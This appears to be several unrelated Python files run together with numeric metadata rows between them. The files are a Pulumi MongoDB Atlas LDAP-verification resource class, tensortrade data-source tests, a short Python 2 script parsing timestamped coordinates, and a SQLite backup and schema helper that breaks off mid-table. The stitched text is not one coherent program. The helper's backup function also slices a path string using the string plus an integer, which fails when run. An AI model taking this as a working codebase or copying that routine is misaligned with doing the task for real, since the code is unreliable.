__props__.__dict__["bind_password"] = bind_password
if bind_username is None and not opts.urn:
raise TypeError("Missing required property 'bind_username'")
__props__.__dict__["bind_username"] = bind_username
__props__.__dict__["ca_certificate"] = ca_certificate
if hostname is None and not opts.urn:
raise TypeError("Missing required property 'hostname'")
__props__.__dict__["hostname"] = hostname
if port is None and not opts.urn:
raise TypeError("Missing required property 'port'")
__props__.__dict__["port"] = port
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["links"] = None
__props__.__dict__["request_id"] = None
__props__.__dict__["status"] = None
__props__.__dict__["validations"] = None
super(LdapVerify, __self__).__init__(
'mongodbatlas:index/ldapVerify:LdapVerify',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
authz_query_template: Optional[pulumi.Input[str]] = None,
bind_password: Optional[pulumi.Input[str]] = None,
bind_username: Optional[pulumi.Input[str]] = None,
ca_certificate: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
links: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LdapVerifyLinkArgs']]]]] = None,
port: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
request_id: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
validations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LdapVerifyValidationArgs']]]]] = None) -> 'LdapVerify':
"""
Get an existing LdapVerify resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] authz_query_template: An LDAP query template that Atlas executes to obtain the LDAP groups to which the authenticated user belongs. Used only for user authorization. Use the {USER} placeholder in the URL to substitute the authenticated username. The query is relative to the host specified with hostname. The formatting for the query must conform to RFC4515 and RFC 4516. If you do not provide a query template, Atlas attempts to use the default value: `{USER}?memberOf?base`.
:param pulumi.Input[str] bind_password: The password used to authenticate the `bind_username`.
:param pulumi.Input[str] bind_username: The user DN that Atlas uses to connect to the LDAP server. Must be the full DN, such as `CN=BindUser,CN=Users,DC=myldapserver,DC=mycompany,DC=com`.
:param pulumi.Input[str] ca_certificate: CA certificate used to verify the identify of the LDAP server. Self-signed certificates are allowed.
:param pulumi.Input[str] hostname: The hostname or IP address of the LDAP server. The server must be visible to the internet or connected to your Atlas cluster with VPC Peering.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LdapVerifyLinkArgs']]]] links: One or more links to sub-resources. The relations in the URLs are explained in the Web Linking Specification.
:param pulumi.Input[int] port: The port to which the LDAP server listens for client connections. Default: `636`
:param pulumi.Input[str] project_id: The unique ID for the project to configure LDAP.
:param pulumi.Input[str] request_id: The unique identifier for the request to verify the LDAP over TLS/SSL configuration.
:param pulumi.Input[str] status: The current status of the LDAP over TLS/SSL configuration. One of the following values: `PENDING`, `SUCCESS`, and `FAILED`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LdapVerifyValidationArgs']]]] validations: Array of validation messages related to the verification of the provided LDAP over TLS/SSL configuration details. The array contains a document for each test that Atlas runs. Atlas stops running tests after the first failure. The following return values can be seen here: [Values](https://docs.atlas.mongodb.com/reference/api/ldaps-configuration-request-verification)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _LdapVerifyState.__new__(_LdapVerifyState)
__props__.__dict__["authz_query_template"] = authz_query_template
__props__.__dict__["bind_password"] = bind_password
__props__.__dict__["bind_username"] = bind_username
__props__.__dict__["ca_certificate"] = ca_certificate
__props__.__dict__["hostname"] = hostname
__props__.__dict__["links"] = links
__props__.__dict__["port"] = port
__props__.__dict__["project_id"] = project_id
__props__.__dict__["request_id"] = request_id
__props__.__dict__["status"] = status
__props__.__dict__["validations"] = validations
return LdapVerify(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="authzQueryTemplate")
def authz_query_template(self) -> pulumi.Output[str]:
"""
An LDAP query template that Atlas executes to obtain the LDAP groups to which the authenticated user belongs. Used only for user authorization. Use the {USER} placeholder in the URL to substitute the authenticated username. The query is relative to the host specified with hostname. The formatting for the query must conform to RFC4515 and RFC 4516. If you do not provide a query template, Atlas attempts to use the default value: `{USER}?memberOf?base`.
"""
return pulumi.get(self, "authz_query_template")
@property
@pulumi.getter(name="bindPassword")
def bind_password(self) -> pulumi.Output[str]:
"""
The password used to authenticate the `bind_username`.
"""
return pulumi.get(self, "bind_password")
@property
@pulumi.getter(name="bindUsername")
def bind_username(self) -> pulumi.Output[str]:
"""
The user DN that Atlas uses to connect to the LDAP server. Must be the full DN, such as `CN=BindUser,CN=Users,DC=myldapserver,DC=mycompany,DC=com`.
"""
return pulumi.get(self, "bind_username")
@property
@pulumi.getter(name="caCertificate")
def ca_certificate(self) -> pulumi.Output[str]:
"""
CA certificate used to verify the identify of the LDAP server. Self-signed certificates are allowed.
"""
return pulumi.get(self, "ca_certificate")
@property
@pulumi.getter
def hostname(self) -> pulumi.Output[str]:
"""
The hostname or IP address of the LDAP server. The server must be visible to the internet or connected to your Atlas cluster with VPC Peering.
"""
return pulumi.get(self, "hostname")
@property
@pulumi.getter
def links(self) -> pulumi.Output[Sequence['outputs.LdapVerifyLink']]:
"""
One or more links to sub-resources. The relations in the URLs are explained in the Web Linking Specification.
"""
return pulumi.get(self, "links")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
The port to which the LDAP server listens for client connections. Default: `636`
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The unique ID for the project to configure LDAP.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="requestId")
def request_id(self) -> pulumi.Output[str]:
"""
The unique identifier for the request to verify the LDAP over TLS/SSL configuration.
"""
return pulumi.get(self, "request_id")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The current status of the LDAP over TLS/SSL configuration. One of the following values: `PENDING`, `SUCCESS`, and `FAILED`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def validations(self) -> pulumi.Output[Sequence['outputs.LdapVerifyValidation']]:
"""
Array of validation messages related to the verification of the provided LDAP over TLS/SSL configuration details. The array contains a document for each test that Atlas runs. Atlas stops running tests after the first failure. The following return values can be seen here: [Values](https://docs.atlas.mongodb.com/reference/api/ldaps-configuration-request-verification)
"""
return pulumi.get(self, "validations")
| 52.654781 | 509 | 0.676681 | 4,089 | 32,488 | 5.215701 | 0.073368 | 0.067567 | 0.060393 | 0.051578 | 0.89525 | 0.877198 | 0.857598 | 0.826839 | 0.801425 | 0.791391 | 0 | 0.00624 | 0.230454 | 32,488 | 616 | 510 | 52.74026 | 0.846806 | 0.460324 | 0 | 0.614925 | 1 | 0 | 0.111376 | 0.011658 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161194 | false | 0.083582 | 0.020896 | 0 | 0.280597 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
cd06fb02cc9e59d1b93e381fe0ab8cd1a33dfade | 2,989 | py | Python | tests/tensortrade/data/stream/test_source.py | viranca/tensortrade | 3a8b59edadbaf86432ef8bbc521c7eee9d406398 | [
"Apache-2.0"
] | 6 | 2020-03-05T14:49:01.000Z | 2022-02-28T01:55:50.000Z | tests/tensortrade/data/stream/test_source.py | Machine-Learning-Labs/tensortrade | 3fe7793a6c1d3d7bfe772166578f624f3f572eca | [
"Apache-2.0"
] | null | null | null | tests/tensortrade/data/stream/test_source.py | Machine-Learning-Labs/tensortrade | 3fe7793a6c1d3d7bfe772166578f624f3f572eca | [
"Apache-2.0"
] | null | null | null |
import pandas as pd
import numpy as np
from tensortrade.data import Stream, DataFrameSource
def test_array_init():
array_ds = Stream('a', [1, 2, 3])
assert array_ds
assert array_ds._array == [1, 2, 3]
assert array_ds._cursor == 0
def test_array_next():
array_ds = Stream('a', [1, 2, 3])
next_value = array_ds.next()
assert next_value == {'a': 1}
def test_array_reset():
array_ds = Stream('a', [1, 2, 3])
assert array_ds.next() == {'a': 1}
assert array_ds.next() == {'a': 2}
assert array_ds.next() == {'a': 3}
array_ds.reset()
assert array_ds.next() == {'a': 1}
assert array_ds.next() == {'a': 2}
assert array_ds.next() == {'a': 3}
def test_data_frame_init():
data = np.array([
[13863.13, 13889., 12952.5, 13480.01, 11484.01],
[13480.01, 15275., 13005., 14781.51, 23957.87],
[14781.51, 15400., 14628., 15098.14, 16584.63],
[15098.14, 15400., 14230., 15144.99, 17980.39],
[15144.99, 17178., 14824.05, 16960.01, 20781.65]
])
index = pd.Index(
['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04', '2018-01-05'],
name="date"
)
columns = ["open", "high", "low", "close", "volume"]
data_frame = pd.DataFrame(data, index=index, columns=columns)
data_frame_ds = DataFrameSource(data_frame)
assert data_frame_ds
def test_data_frame_next():
data = np.array([
[13863.13, 13889., 12952.5, 13480.01, 11484.01],
[13480.01, 15275., 13005., 14781.51, 23957.87],
[14781.51, 15400., 14628., 15098.14, 16584.63],
[15098.14, 15400., 14230., 15144.99, 17980.39],
[15144.99, 17178., 14824.05, 16960.01, 20781.65]
])
index = pd.Index(
['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04', '2018-01-05'],
name="date"
)
columns = ["open", "high", "low", "close", "volume"]
data_frame = pd.DataFrame(data, index=index, columns=columns)
data_frame_ds = DataFrameSource(data_frame)
d1 = data_frame_ds.next()
assert d1 == {k: v for k, v in zip(columns, data[0, :])}
def test_data_frame_reset():
data = np.array([
[13863.13, 13889., 12952.5, 13480.01, 11484.01],
[13480.01, 15275., 13005., 14781.51, 23957.87],
[14781.51, 15400., 14628., 15098.14, 16584.63],
[15098.14, 15400., 14230., 15144.99, 17980.39],
[15144.99, 17178., 14824.05, 16960.01, 20781.65]
])
index = pd.Index(
['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04', '2018-01-05'],
name="date"
)
columns = ["open", "high", "low", "close", "volume"]
data_frame = pd.DataFrame(data, index=index, columns=columns)
data_frame_ds = DataFrameSource(data_frame)
for i in range(5):
assert data_frame_ds.next() == {k: v for k, v in zip(columns, data[i, :])}
data_frame_ds.reset()
for i in range(5):
assert data_frame_ds.next() == {k: v for k, v in zip(columns, data[i, :])}
| 28.740385 | 82 | 0.578454 | 449 | 2,989 | 3.728285 | 0.178174 | 0.091398 | 0.069892 | 0.060932 | 0.808841 | 0.808841 | 0.799283 | 0.789128 | 0.789128 | 0.775388 | 0 | 0.268897 | 0.229843 | 2,989 | 103 | 83 | 29.019417 | 0.458297 | 0 | 0 | 0.702703 | 0 | 0 | 0.079652 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 1 | 0.081081 | false | 0 | 0.040541 | 0 | 0.121622 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
cd98e0aa0b21850192afd827b2a2208bde5b0429 | 2,744 | py | Python | awsLambda_ours/tupleStuff.py | Vishakha1990/Lambdas | 803028633f25911cbc74c28e4c1ec11276912102 | [
"Apache-2.0"
] | null | null | null | awsLambda_ours/tupleStuff.py | Vishakha1990/Lambdas | 803028633f25911cbc74c28e4c1ec11276912102 | [
"Apache-2.0"
] | null | null | null | awsLambda_ours/tupleStuff.py | Vishakha1990/Lambdas | 803028633f25911cbc74c28e4c1ec11276912102 | [
"Apache-2.0"
] | 1 | 2020-01-08T18:00:04.000Z | 2020-01-08T18:00:04.000Z | # your code goes here
from operator import itemgetter
myList = []
myList.append('2010-10-12T23:58:03Z,30.261599404,-97.7585805953')
myList.append('2010-10-12T22:02:11Z,30.2679095833,-97.7493124167')
myList.append('2010-10-12T19:44:40Z,30.2691029532,-97.7493953705')
myList.append('2010-10-12T15:57:20Z,30.2811204101,-97.7452111244')
myList.append('2010-10-12T15:19:03Z,30.2691029532,-97.7493953705')
myList.append('2010-10-19T23:55:27Z,30.2359091167,-97.7951395833')
myList.append('2010-10-18T22:17:43Z,30.2691029532,-97.7493953705')
myList.append('2010-10-17T23:42:03Z,30.2557309927,-97.7633857727')
myList.append('2010-10-17T19:26:05Z,30.2634181234,-97.7575966669')
myList.append('2010-10-16T18:50:42Z,30.2742918584,-97.7405226231')
# myList.append('2010-10-12T00:21:28Z,40.6438845363,-73.7828063965')
# myList.append('2010-10-11T20:21:20Z,40.74137425,-73.9881052167')
# myList.append('2010-10-11T20:20:42Z,40.741388197,-73.9894545078')
# myList.append('2010-10-11T00:06:30Z,40.7249103345,-73.9946207517')
# myList.append('2010-10-10T22:00:37Z,40.729768314,-73.9985353275')
# myList.append('2010-10-10T21:17:14Z,40.7285271242,-73.9968681335')
# myList.append('2010-10-10T17:47:04Z,40.7417466987,-73.993421425')
# myList.append('2010-10-09T23:51:10Z,40.7341933833,-74.0041635333')
# myList.append('2010-10-09T22:27:07Z,40.7425115937,-74.0060305595')
# myList.append('2010-10-09T21:39:26Z,40.7423961659,-74.0075433254')
# myList.append('2010-10-09T21:36:05Z,40.7423961659,-74.0075433254')
# myList.append('2010-10-09T21:05:23Z,40.7358847426,-74.0049684048')
# myList.append('2010-10-09T20:55:47Z,40.7275253534,-73.9853990078')
# myList.append('2010-10-09T01:37:03Z,40.7568799674,-73.9862251282')
# myList.append('2010-10-08T21:48:37Z,40.7074172208,-74.0113627911')
# myList.append('2010-10-08T21:45:48Z,40.7071727167,-74.0105454333')
# myList.append('2010-10-08T21:43:52Z,40.7070708167,-74.0119528667')
# myList.append('2010-10-08T21:43:02Z,40.705823135,-73.9966964722')
# myList.append('2010-10-08T19:28:36Z,40.7693780407,-73.9630830288')
# myList.append('2010-10-08T17:24:27Z,40.7808054632,-73.9764726162')
# myList.append('2010-10-08T00:07:48Z,40.7317243329,-74.0033376217')
# myList.append('2010-10-07T23:18:10Z,40.7308686424,-73.9975655079')
# myList.append('2010-10-07T21:58:31Z,40.7422010764,-73.9879953861')
# myList.append('2010-10-07T21:02:01Z,40.7458101407,-73.9882206917')
# myList.append('2010-10-07T20:31:48Z,40.7484436586,-73.9857316017')
# myList.append('2010-10-07T20:14:44Z,40.7515076167,-73.9755')
# myList.append('2010-10-07T15:27:40Z,40.6438845363,-73.7828063965')
tupleList = []
for tupleEntry in myList:
tupleList.append(tuple(tupleEntry.split(',')))
print tupleList
print max(tupleList,key=itemgetter(0))[0]
| 50.814815 | 68 | 0.755102 | 435 | 2,744 | 4.763218 | 0.404598 | 0.214286 | 0.285714 | 0.321429 | 0.243726 | 0.130309 | 0.106178 | 0.106178 | 0.045367 | 0 | 0 | 0.52761 | 0.036443 | 2,744 | 53 | 69 | 51.773585 | 0.256051 | 0.661808 | 0 | 0 | 0 | 0 | 0.54505 | 0.543938 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.058824 | null | null | 0.117647 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
26fe95091b713d6ad34689fd290c1d9965c51f61 | 40,228 | py | Python | DBH.py | UriynikLolzer/exchange-rates-tg-bot | 19019fb09812d41b5a74eb22674dbc41a4c28927 | [
"MIT"
] | 10 | 2020-06-11T17:19:01.000Z | 2022-03-25T17:52:18.000Z | DBH.py | UriynikLolzer/exchange-rates-tg-bot | 19019fb09812d41b5a74eb22674dbc41a4c28927 | [
"MIT"
] | 3 | 2021-08-16T16:33:25.000Z | 2022-01-13T18:30:53.000Z | DBH.py | UriynikLolzer/exchange-rates-tg-bot | 19019fb09812d41b5a74eb22674dbc41a4c28927 | [
"MIT"
] | 6 | 2020-07-24T17:40:30.000Z | 2021-09-16T11:29:16.000Z | import sqlite3 as sql
import sys
import os
from typing import Set
import json
import zipfile
import datetime
from NewPrint import Print
listOfTables = ["SettingsGroups", "SettingsPrivateChats", "ExchangeRates", "SettingsExchangeRates", "CryptoRates", "SettingsCryptoRates"]
listOfServiceTables = ["AdminsList", "BlackList", "Reports"]
listOfStatsTables = ["ChatsTimeStats", "ChatsUsage", "ProcessedCurrencies"]
def CreateFileBackup(filePath: str):
if os.path.exists("Backups"):
pass
else:
Print("Folder 'Backups' not found.", "E")
os.mkdir("Backups")
Print("Folder 'Backups' is created", "S")
today = datetime.datetime.today()
dt = today.strftime("%Y-%m-%d-%H.%M.%S")
nameOfDB = filePath.find("/")
nameOfDB = filePath[filePath + 1:-7]
nameOfArch = 'Backups/' + nameOfDB + '-' + dt + '.zip'
zipArch = zipfile.ZipFile(nameOfArch, 'w')
try:
zipArch.write(filePath)
zipArch.close()
Print(filePath + " added to " + nameOfArch, "S")
except:
Print("Cannot add " + filePath + " to archive.", "E")
def CreateAllBackups() -> str:
if os.path.exists("Backups"):
pass
else:
Print("Folder 'Backups' not found.", "E")
os.mkdir("Backups")
Print("Folder 'Backups' is created", "S")
today = datetime.datetime.today()
dt = today.strftime("%Y-%m-%d-%H.%M.%S")
nameOfArch = 'Backups/backup-' + dt + '.zip'
zipArch = zipfile.ZipFile(nameOfArch, 'w')
try:
zipArch.write("DataBases/DataForBot.sqlite")
zipArch.write("DataBases/ServiceData.sqlite")
zipArch.write("DataBases/StatsData.sqlite")
zipArch.close()
Print("Backup " + nameOfArch + " created.", "S")
except:
Print("Cannot create archive.", "E")
return nameOfArch
def DBIntegrityCheck():
if os.path.exists("DataBases/DataForBot.sqlite"):
# Connect to DB
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
Print("Connected to main DB successfully.", 'S')
# Getting all names of tables
cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
listNames = cursor.fetchall()
for i in range(len(listNames)):
listNames[i] = listNames[i][0]
for i in listOfTables:
if not i in listNames:
CreateFileBackup("DataBases/DataForBot.sqlite")
os.remove('DataBases/DataForBot.sqlite')
Print("Error. Main database is corrupted. 'DataForBot.sqlite' was backuped and deleted. New database will be create automatically.", "E")
CreateDataBaseTemplate()
break
Print("Main DB is OK.", "S")
else:
Print("Connected to main DB unsuccessfully.", "E")
CreateDataBaseTemplate()
if os.path.exists("DataBases/ServiceData.sqlite"):
# Connect to DB
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
Print("Connected to service DB successfully.", "S")
# Getting all names of tables
cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
listNames = cursor.fetchall()
for i in range(len(listNames)):
listNames[i] = listNames[i][0]
for i in listOfServiceTables:
if not i in listNames:
CreateFileBackup("DataBases/ServiceData.sqlite")
os.remove('DataBases/ServiceData.sqlite')
Print("Error. Service database is corrupted. 'ServiceData.sqlite' was backuped and deleted. New database will be create automatically.", "E")
CreateServiceDataBase()
break
Print("Service DB is OK.", "S")
else:
Print("Connected to service DB unsuccessfully.", "E")
CreateServiceDataBase()
if os.path.exists("DataBases/StatsData.sqlite"):
con = sql.connect("DataBases/StatsData.sqlite")
cursor = con.cursor()
Print("Connected to stats DB successfully.", "S")
cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
listNames = cursor.fetchall()
for i in range(len(listNames)):
listNames[i] = listNames[i][0]
for i in listOfStatsTables:
if not i in listNames:
CreateFileBackup("DataBases/StatsData.sqlite")
os.remove("DataBases/StatsData.sqlite")
Print("Error. Stats database is corrupted. 'StatsData.sqlite' was backuped and deleted. New database will be create automatically.", "E")
CreateStatsDataBase()
break
Print("Stats DB is OK.", "S")
else:
Print("Connected to stats DB unsuccessfully.", "E")
CreateStatsDataBase()
def CreateStatsDataBase():
Print("Creating stats DB is starting...", "S")
# Connect to DB
con = sql.connect('DataBases/StatsData.sqlite')
cursor = con.cursor()
with con:
con.execute("""
CREATE TABLE ChatsUsage (
chatID INTEGER NOT NULL PRIMARY KEY,
chatType TEXT,
timeAdded TEXT,
lastTimeUse TEXT
);
""")
with con:
con.execute("""
CREATE TABLE ChatsTimeStats (
date TEXT,
privateChatsAmount INTEGER DEFAULT 0,
groupChatsAmount INTEGER DEFAULT 0,
activeWeekPrivateChats INTEGER DEFAULT 0,
activeWeekGroupChats INTEGER DEFAULT 0,
activeMonthPrivateChats INTEGER DEFAULT 0,
activeMonthGroupChats INTEGER DEFAULT 0
);
""")
with con:
con.execute("""
CREATE TABLE ProcessedCurrencies (
date TEXT,
chatID INTEGER,
userID INTEGER,
proccesedCurrency TEXT,
message TEXT,
_AED INTEGER DEFAULT 0,
_AFN INTEGER DEFAULT 0,
_ALL INTEGER DEFAULT 0,
_AMD INTEGER DEFAULT 0,
_ANG INTEGER DEFAULT 0,
_AOA INTEGER DEFAULT 0,
_ARS INTEGER DEFAULT 0,
_AUD INTEGER DEFAULT 0,
_AWG INTEGER DEFAULT 0,
_AZN INTEGER DEFAULT 0,
_BAM INTEGER DEFAULT 0,
_BBD INTEGER DEFAULT 0,
_BDT INTEGER DEFAULT 0,
_BGN INTEGER DEFAULT 0,
_BHD INTEGER DEFAULT 0,
_BIF INTEGER DEFAULT 0,
_BMD INTEGER DEFAULT 0,
_BND INTEGER DEFAULT 0,
_BOB INTEGER DEFAULT 0,
_BRL INTEGER DEFAULT 0,
_BSD INTEGER DEFAULT 0,
_BTN INTEGER DEFAULT 0,
_BWP INTEGER DEFAULT 0,
_BYN INTEGER DEFAULT 0,
_BZD INTEGER DEFAULT 0,
_CAD INTEGER DEFAULT 0,
_CDF INTEGER DEFAULT 0,
_CHF INTEGER DEFAULT 0,
_CLF INTEGER DEFAULT 0,
_CLP INTEGER DEFAULT 0,
_CNY INTEGER DEFAULT 0,
_COP INTEGER DEFAULT 0,
_CRC INTEGER DEFAULT 0,
_CUC INTEGER DEFAULT 0,
_CUP INTEGER DEFAULT 0,
_CVE INTEGER DEFAULT 0,
_CZK INTEGER DEFAULT 0,
_DJF INTEGER DEFAULT 0,
_DKK INTEGER DEFAULT 0,
_DOP INTEGER DEFAULT 0,
_DZD INTEGER DEFAULT 0,
_EGP INTEGER DEFAULT 0,
_ERN INTEGER DEFAULT 0,
_ETB INTEGER DEFAULT 0,
_EUR INTEGER DEFAULT 0,
_FJD INTEGER DEFAULT 0,
_FKP INTEGER DEFAULT 0,
_GBP INTEGER DEFAULT 0,
_GEL INTEGER DEFAULT 0,
_GGP INTEGER DEFAULT 0,
_GHS INTEGER DEFAULT 0,
_GIP INTEGER DEFAULT 0,
_GMD INTEGER DEFAULT 0,
_GNF INTEGER DEFAULT 0,
_GTQ INTEGER DEFAULT 0,
_GYD INTEGER DEFAULT 0,
_HKD INTEGER DEFAULT 0,
_HNL INTEGER DEFAULT 0,
_HRK INTEGER DEFAULT 0,
_HTG INTEGER DEFAULT 0,
_HUF INTEGER DEFAULT 0,
_IDR INTEGER DEFAULT 0,
_ILS INTEGER DEFAULT 0,
_IMP INTEGER DEFAULT 0,
_INR INTEGER DEFAULT 0,
_IQD INTEGER DEFAULT 0,
_IRR INTEGER DEFAULT 0,
_ISK INTEGER DEFAULT 0,
_JEP INTEGER DEFAULT 0,
_JMD INTEGER DEFAULT 0,
_JOD INTEGER DEFAULT 0,
_JPY INTEGER DEFAULT 0,
_KES INTEGER DEFAULT 0,
_KGS INTEGER DEFAULT 0,
_KHR INTEGER DEFAULT 0,
_KMF INTEGER DEFAULT 0,
_KPW INTEGER DEFAULT 0,
_KRW INTEGER DEFAULT 0,
_KWD INTEGER DEFAULT 0,
_KYD INTEGER DEFAULT 0,
_KZT INTEGER DEFAULT 0,
_LAK INTEGER DEFAULT 0,
_LBP INTEGER DEFAULT 0,
_LKR INTEGER DEFAULT 0,
_LRD INTEGER DEFAULT 0,
_LSL INTEGER DEFAULT 0,
_LTL INTEGER DEFAULT 0,
_LVL INTEGER DEFAULT 0,
_LYD INTEGER DEFAULT 0,
_MAD INTEGER DEFAULT 0,
_MDL INTEGER DEFAULT 0,
_MGA INTEGER DEFAULT 0,
_MKD INTEGER DEFAULT 0,
_MMK INTEGER DEFAULT 0,
_MNT INTEGER DEFAULT 0,
_MOP INTEGER DEFAULT 0,
_MRO INTEGER DEFAULT 0,
_MUR INTEGER DEFAULT 0,
_MVR INTEGER DEFAULT 0,
_MWK INTEGER DEFAULT 0,
_MXN INTEGER DEFAULT 0,
_MYR INTEGER DEFAULT 0,
_MZN INTEGER DEFAULT 0,
_NAD INTEGER DEFAULT 0,
_NGN INTEGER DEFAULT 0,
_NIO INTEGER DEFAULT 0,
_NOK INTEGER DEFAULT 0,
_NPR INTEGER DEFAULT 0,
_NZD INTEGER DEFAULT 0,
_OMR INTEGER DEFAULT 0,
_PAB INTEGER DEFAULT 0,
_PEN INTEGER DEFAULT 0,
_PGK INTEGER DEFAULT 0,
_PHP INTEGER DEFAULT 0,
_PKR INTEGER DEFAULT 0,
_PLN INTEGER DEFAULT 0,
_PYG INTEGER DEFAULT 0,
_QAR INTEGER DEFAULT 0,
_RON INTEGER DEFAULT 0,
_RSD INTEGER DEFAULT 0,
_RUB INTEGER DEFAULT 0,
_RWF INTEGER DEFAULT 0,
_SAR INTEGER DEFAULT 0,
_SBD INTEGER DEFAULT 0,
_SCR INTEGER DEFAULT 0,
_SDG INTEGER DEFAULT 0,
_SEK INTEGER DEFAULT 0,
_SGD INTEGER DEFAULT 0,
_SHP INTEGER DEFAULT 0,
_SLL INTEGER DEFAULT 0,
_SOS INTEGER DEFAULT 0,
_SRD INTEGER DEFAULT 0,
_SVC INTEGER DEFAULT 0,
_SYP INTEGER DEFAULT 0,
_SZL INTEGER DEFAULT 0,
_THB INTEGER DEFAULT 0,
_TJS INTEGER DEFAULT 0,
_TMT INTEGER DEFAULT 0,
_TND INTEGER DEFAULT 0,
_TOP INTEGER DEFAULT 0,
_TRY INTEGER DEFAULT 0,
_TTD INTEGER DEFAULT 0,
_TWD INTEGER DEFAULT 0,
_TZS INTEGER DEFAULT 0,
_UAH INTEGER DEFAULT 0,
_UGX INTEGER DEFAULT 0,
_USD INTEGER DEFAULT 0,
_UYU INTEGER DEFAULT 0,
_UZS INTEGER DEFAULT 0,
_VEF INTEGER DEFAULT 0,
_VND INTEGER DEFAULT 0,
_VUV INTEGER DEFAULT 0,
_WST INTEGER DEFAULT 0,
_XAF INTEGER DEFAULT 0,
_XAG INTEGER DEFAULT 0,
_XAU INTEGER DEFAULT 0,
_XCD INTEGER DEFAULT 0,
_XOF INTEGER DEFAULT 0,
_XPF INTEGER DEFAULT 0,
_YER INTEGER DEFAULT 0,
_ZAR INTEGER DEFAULT 0,
_ZMW INTEGER DEFAULT 0,
_ZWL INTEGER DEFAULT 0,
_ADA INTEGER DEFAULT 0,
_BCH INTEGER DEFAULT 0,
_BNB INTEGER DEFAULT 0,
_BTC INTEGER DEFAULT 0,
_DASH INTEGER DEFAULT 0,
_DOGE INTEGER DEFAULT 0,
_ETC INTEGER DEFAULT 0,
_ETH INTEGER DEFAULT 0,
_LTC INTEGER DEFAULT 0,
_RVN INTEGER DEFAULT 0,
_TRX INTEGER DEFAULT 0,
_XLM INTEGER DEFAULT 0,
_XMR INTEGER DEFAULT 0,
_XRP INTEGER DEFAULT 0
);
""")
con.close()
Print("Stats DB is created.", "S")
def CreateServiceDataBase():
if os.path.exists("DataBases"):
pass
else:
Print("Folder 'DataBases' not found", "E")
sys.exit(1)
Print("Creating service DB is starting...", "S")
# Connect to DB
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
with con:
con.execute("""
CREATE TABLE AdminsList (
adminID INTEGER NOT NULL PRIMARY KEY
);
""")
with con:
con.execute("""
CREATE TABLE BlackList (
userID INTEGER NOT NULL PRIMARY KEY ,
banDate TEXT DEFAULT 0,
chatID INTEGER DEFAULT 0,
chatName TEXT DEFAULT 0
);
""")
with con:
con.execute("""
CREATE TABLE Reports (
date TEXT,
chatID INTEGER DEFAULT 0,
userID INTEGER DEFAULT 0,
message TEXT,
reply TEXT
);
""")
con.close()
Print("Service DB is created.", "S")
def CreateDataBaseTemplate():
if os.path.exists("DataBases"):
pass
else:
Print("Folder 'DataBases' not found", "E")
os.mkdir("DataBases")
Print("Folder 'DataBases' is created", "S")
Print("Creating main DB is starting...", "S")
# Connect to DB
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
with con:
con.execute("""
CREATE TABLE SettingsGroups (
chatID INTEGER NOT NULL PRIMARY KEY ,
deleteRules TEXT DEFAULT admins,
deleteButton INTEGER DEFAULT 1,
editSettings TEXT DEFAULT admins,
flags INTEGER DEFAULT 1,
lang TEXT DEFAULT en
);
""")
with con:
con.execute("""
CREATE TABLE SettingsPrivateChats (
chatID INTEGER NOT NULL PRIMARY KEY ,
deleteButton INTEGER DEFAULT 1,
flags INTEGER DEFAULT 1,
lang TEXT DEFAULT en
);
""")
with con:
con.execute("""
CREATE TABLE ExchangeRates (
currency TEXT NOT NULL PRIMARY KEY,
flag TEXT,
exchangeRates FLOAT
);
""")
with con:
con.execute("""
CREATE TABLE CryptoRates (
currency TEXT NOT NULL PRIMARY KEY,
flag TEXT,
